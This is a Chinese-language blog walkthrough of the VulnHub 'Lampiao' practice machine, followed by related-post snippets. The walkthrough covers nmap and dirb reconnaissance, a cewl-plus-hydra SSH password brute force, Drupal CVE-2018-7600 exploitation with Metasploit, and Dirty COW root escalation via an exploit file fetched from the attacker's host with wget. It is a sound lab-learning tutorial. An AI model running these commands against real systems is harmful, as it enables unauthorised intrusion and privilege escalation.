挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】

已于 2022-11-28 16:11:34 修改
阅读量1.2k 收藏 19
点赞数 5
分类专栏: 木木北星 文章标签: 学习 服务器 ssh web安全 网络安全
于 2022-11-27 14:46:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68119378/article/details/128064171
版权

靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/

靶机难度:中等

工具:kalilinux; 一个灵活的脑子 ; 一双手

目标:得到root权限&找到flag.txt

作者:木木北星

声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。

第一步信息收集

信息收集在整个渗透过程中占80%左右。在虚拟机中确认攻击的ip地址,nmap获取目标ip地址(有很多工具我个人比较喜欢nmap)

使用命令:nmap -sP 192.168.222.0/24

解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24)

得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描:

使用命令:nmap -sS -sV -T5 -A -p- 192.168.222.137

可以看出靶机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。由于目标靶机上的端口80可用,我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:

F12 查看这是一个静态页面,没发现什么有用的信息所以换1898端口:

可以分别进入两个页面:

第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。

发现两个文件:

第一个文件内是一个音频,语音内容为:user tiago,则用户名为:tiago

第二个文件是一个二维码,扫码后的内容是一句话:Try harder!Muahuahua...没用的信息

接下来开始用工具对网站进行爆破扫描...(也可以使用御剑)

使用命令: dirb http://192.168.222.137:1898 -o out

找到一个robots.txt的文件,后台打开看看:

经过漫长的信息收集终于在CHANGELOG.txt文件中发现了网站的基本信息

这是一个基于Drupal 7的博客或是社交网站。

cewl:通过爬行网站获取关键信息创建一个密码字典

hydra:神器九头蛇,网上有太多资料

使用命令:cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt

hydra -l tiago -P mmbx.txt 192.168.222.137 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:

用户: tiago

密码: Virgulino

重要的来了!!!!使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!

第二部shell提权

现在利用收集到的信息进行提权

刚刚在文件收集到这个网站是2016年的Durpal7

这边我们查询到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。

先输入指令:msfconsole

再search CVE-2018-7600

然后再use这个指令

rhosts设置靶机IP

rport设置靶机端口

run开跑

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。

下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp

思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上

命令:python -m http.server 8879 开启服务

网站登录端口(这里注意,ip地址是你kali的IP地址)

命令:wget http://192.168.222.128 :8879/40847.cpp

将40847.cp上传到靶机上

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

执行gcc编译可执行文件,可直接提权。

打开文件成功看到靶机root的密码

直接登录root

输入ls(列出目前工作目录所含之文件及子目录)

发现flag最后查看文件

最后:如果本人有哪些步骤没有做的精细的望大佬勿喷,本人也喜欢结实五湖四海的朋友一起探讨学习技术。

有兴趣的可以斯我

Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 2012
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是才我们才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
全网详细的渗透测试靶机实操步骤——vulnhub靶机实战(三)w1r3s-101
hyjcking的博客
11-24 1381
在游览器中输入上面的url,页面没有回显,但是可以肯定的是这个php文件是存在的,可能是因为这个网站的cms经过二次开发导致目录结构发生改变,所以无法访问通,所以我打算使用curl对参数urlconfig进行urlencode编码。接下来我们只需要破解这段密文即可,把拥有密码的几个用户全部保存到pass.txt文档上(在桌面创建一个),然后命令:john pass.txt跑出密码。接下来的步骤就很明朗了,直接去百度上搜cuppa cms的漏洞,找到漏洞编号。开启靶机之后先扫了一下内网IP找到靶机的IP。
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2446
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
靶机Lampiao入侵实战
最新发布
没有网络安全就没有国家安全
03-08 904
靶机Lampiao入侵实战
vulnhub靶机实战——W1R3S
weixin_30294295的博客
05-13 438
环境 靶机ip:192.168.163.132 攻击机ip:192.168.163.129 目的:拿下靶机并获得root权限 渗透 首先nmap扫描端口 nmap -sC -sV 192.168.163.132 可看到靶机开启了ftp端口21,ssh端口22,http端口80,mysql端口3306。 首先看到了21端口的ftp允许匿名登陆,于是登陆ftp服务器找有...
vulnhub靶机实战——Matrix:1
weixin_30420305的博客
05-24 294
环境 靶机ip:192.168.163.139 攻击机ip:192.168.163.129 目标:拿下靶机root权限 知识点 生成专属的爆破字典,受限shell rbash的绕过 渗透 首先nmap扫描靶机开启的端口 开了三个端口,分别是22的ssh,80和31337的http 看到31337开着http就觉得很可疑,感觉十有八九突破点是这个web ...
vulnhub--lampiao(脏牛提权)
鲨鱼辣椒的博客
08-03 4906
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
全网详细的渗透测试靶机实操步骤——vulnhub靶机实战(四)venom1 这台靶机步骤让你充分了解反弹shell的原理及用法
hyjcking的博客
11-26 1511
这台靶机结合了很多渗透测试的知识,可以让你充分了解反弹shell的原理及用法
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
vulnhub靶机实战-My-cmsms靶机
09-29
本文档将针对vulnhub靶机实战-My-cmsms靶机详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中的主机。常见的主机发现方法有...
Vulnhub靶机实战——Matrix3
冠霖L的博客
11-15 996
下载地址: https://download.vulnhub.com/matrix/Machine_Matrix_v3.ova 环境: VMware 15虚拟机软件 Matrix3靶机IP地址:192.168.220.160 Kali的IP地址:192.168.220.155 Matrix3靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ip add...
【甄选靶场】Vulnhub百个项目渗透——项目二:LampiaoSSH爆破,脏牛提权)
人间体佐菲的博客
08-30 2041
【甄选靶场】Vulnhub百个项目渗透——项目二:LampiaoSSH爆破,脏牛提权)
Vulnhub靶机实战-NARAK
黑白的博客
01-18 1127
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
Vulnhub靶机实战-HA AVENGERS ARSENAL
黑白的博客
01-10 468
声明 好好学习,天天向上 搭建 vulnhub官网下载完镜像后,用vmware打开,遇到错误点击重试,即可,选择NAT后,直接就DHCP了 渗透 目标,寻找五位超级英雄的武器,漫威题材,还挺有意思 VIBRANIUM SHIELD美队的盾牌 MJØLNIR 雷神之锤 SCEPTRE 洛基权杖 STORMBREAKER 雷神的风暴战斧 YAKA ARROW 勇度的亚卡箭 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.195 -p 1-65535 -o
Vulnhub靶机实战-Lazysysadmin
黑白的博客
01-10 399
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A 有意思,开启端口不少 发现开启80,22,139,445,3306,6667 访问80 http://192.168.239.15 扫描目录 python3 dirsearch.py -u http:
Vulnhub靶机实战——Matrix2
devil8123665的博客
08-21 380
Vulnhub靶机实战——Matrix2 https://blog.csdn.net/weixin_43583637/article/details/102999591
DAY29(DAY30拓展):Vulnhub--靶机实战
qq_49433473的博客
08-12 2445
Vulnhub DC-1、DC-2靶机通关手册
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1922
Vulnhub-CTF5靶机实战
Vulnhub-Btrsys-2靶机实战
御七彩虹猫
04-18 2863
Vulnhub-Btrsys-2靶机实战
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值